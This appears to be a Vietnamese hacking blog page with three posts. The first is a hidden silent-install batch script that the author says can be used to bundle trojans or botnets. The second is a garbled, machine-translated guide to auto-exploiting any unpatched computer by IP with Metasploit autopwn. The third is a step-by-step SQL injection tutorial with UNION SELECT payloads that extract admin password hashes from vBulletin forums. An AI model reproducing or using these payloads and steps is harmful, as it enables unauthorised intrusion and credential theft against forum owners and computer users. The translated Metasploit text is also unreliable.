Thứ Hai, 25 tháng 2, 2013

Tự động cài đặt âm thầm nhiều phần mềm chạy cùng 1 lúc

Dùng để blind virus/trojan/botnet được đấy.

+ Chuẩn bi:

- Một số phần mềm quan trọng của mình hay dùng ( vd: Winrar, Yahoo, Unikey, VietKey...)
- Tools Universal Silent Switch Finder 1.5.0.0 để kiểm tra mã Silent Switch ( Down ở file đính kèm )
ussf.rar

+ Thực Hiện
- Sau khi chuẩn bị 1 số phần mềm của mình hay dùng rồi và cho gộp chung một thư mục Setup
- Down Tools Universal Silent Switch Finder 1.5.0.0 và mở nó lên, nhấn vào nut > ở ô File, cuối cùng chọn tới setup phần mềm. sau đó dợi một lúc ở ô Usage sẽ xuất hiện mã Silent Switch
- Ví dụ tôi chọn Winrar401b1.exe thì có mã Silent Switch /S



- Sau khi đã có mã Silent Switch thì thực hiện như sau:
Mở notepad lên ( Start/run gõ notepad ) rồi dán code này vào



@ECHO OFF

IF EXIST %WinDir%\System32\CMDOW.EXE CMDOW @ /HID

START /WAIT [Tên file phần mềm 1] [Mã Silent Switch 1]

START /WAIT [Tên file phần mềm 2] [Mã Silent Switch 2]


EXIT



Sau đó nhấn phím Ctrl + S. Ở ô File name điền Install.bat, ở ô File as type chọn all file, nhấn vào SAVE và cuối cùng chọn tới thư mục Setup

Ví dụ của tôi thì làm như thế này

@ECHO OFF

IF EXIST %WinDir%\System32\CMDOW.EXE CMDOW @ /HID

START /WAIT wrar401b1.exe /S

START /WAIT teracopy.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-

EXIT


Hack Bất kỳ máy tính Với ip one [MetaSploit]

Tôi ở đây để cho bạn thấy công cụ này huyền diệu gọi là Metasploit, cho phép bạn để hack máy tính ANYunpatched với IP của nó chỉ. Cho phép bắt đầu ...
1) Đầu tiên bạn cần phải tải về Metasploit. Nhất up-to-date là phiên bản miễn phí tại metasploit.com
2.) cần PostgrSQL cho cơ sở dữ liệu của bạn. Tải về tại đây:
Code:
http://www.postgresql.org/
.
Hãy chắc chắn rằng bạn sử dụng tất cả các giá trị mặc ​​định hoặc làm việc woun't Metasploit
3) Bây giờ cho phép nhận được xuống để buisness ... Sau khi cài đặt cả hai công cụ, mở gui quản trị PostgrSQL (bắt đầu -> tất cả các chương trình -> PostgreSQL 9,0 -> pgAdmin III) . Sau đó, nhấp chuột phải vào máy chủ của bạn (hộp tay trái) và nhấp vào kết nối. Hãy nhớ để giữ cho cửa sổ này mở toàn bộ thời gian. Bạn cũng sẽ cần vượt qua bạn đã chọn để sử dụng trong bước 5 ...

4) Thời gian cho một số hacking. Go để bắt đầu -> tất cả các chương trình -> Metasploit Framework, và sau đó mở Metasploit gui. Hãy để nó tải cho đến khi nó trông như thế này:

5) Bây giờ, trong các loại cửa sổ: db_connect postgres: ThePassYouChose @ localhost: 5432 Lần đầu tiên bạn làm điều này bạn sẽ thấy rất nhiều mua flash văn bản. Không wory, điều này là bình thường.


6) Loại db_host để chắc chắn rằng bạn đang kết nối correctally
. 7) Bây giờ loại này:
db_nmap 000.000.000.000
Hãy chắc chắn rằng bạn đặt IP của máy tính bạn đang cố gắng để hack trong nơi 000.000.000.000 ...
7) Now. chúng tôi nhận được các phần thú vị, khai thác tự động. Chỉ cần gõ db_autopwn-t-p-e-s-b, xem bắt đầu tự động khai thác, đi chơi Halo trong một thời gian, và sau đó quay trở lại ...
8) Sau khi khai thác được thực hiện, loại phiên-l để xem những gì máy quét được tìm thấy. Nếu tất cả đều tốt, bạn sẽ thấy một danh sách khai thác.
9.) Bây giờ chúng tôi nhận được để sử dụng khai thác để hack máy tính! Nếu bạn sẽ nhận thấy, tất cả các khai thác số, và tất cả họ đều có tên rõ ràng (ví dụ, reverseScreen_tcp). Để sử dụng khai thác, loại này:
phiên-i ExploitNumber

Thứ Sáu, 1 tháng 2, 2013

Hàm truy vấn Bug Topx vbb

Định ko post TUT này sớm nhưng dù sao cũng có người làm hướng dẫn rồi nên post luôn cho ae.

Không hide

Chú ý là đừng mang đi phá người ta quá nhé
Ở diễn đàn có sử dụng mod changuondyu static. Ví dụ: http://forumvictim.com/forum
Bạn truy cập vào: http://forumvictim.com/forum/ajax.ph...nforum&result=10&listforumid=123

2 kái chữ bôi đỏ các bạn thay cho phù hợp (Ra ngoài forum home xem victim để giá trị result như nào, listforumid thì các bạn lấy 1 id chuyên mục của victim)

Tiếp theo bạn thử thêm dấu đóng ngoặc " ) " vào sau xem, nếu nó lỗi tức là site chưa fix


Mã:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123

Nếu đã lỗi rồi thì các bạn thực hiện order by để tìm column:
Mã:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) ORDER BY 11-- -
Bạn thay số 11 đỏ ở kia = số phù hợp, sao cho đó là số lớn nhất có thể mà khi đó ko bị lỗi (Thường thì là 10)

Giả sử mình đã tìm đc giá trị đó là 10 rồi thì tiếp theo sẽ select thôi.
Mã:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(password),3,4,5,6,7,8,9,10 FROM user WHERE userid=1-- -
(Bạn có thể thử thay cái group_concat vào các số 6 hay 7 để hiển thị đc kquả tốt nhất)

Nếu xảy ra lỗi thì có thể forum này họ để VBB TABLE PREFIX, tức là table của họ ko phải dạng user nữa mà là kiểu như dct_user chẳng hạn, lúc này ta tìm tên table = cách:

Mã:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 FROM information_schema.tables-- -
=> Xem tiền tố table là gì rồi bắt đầu khai thác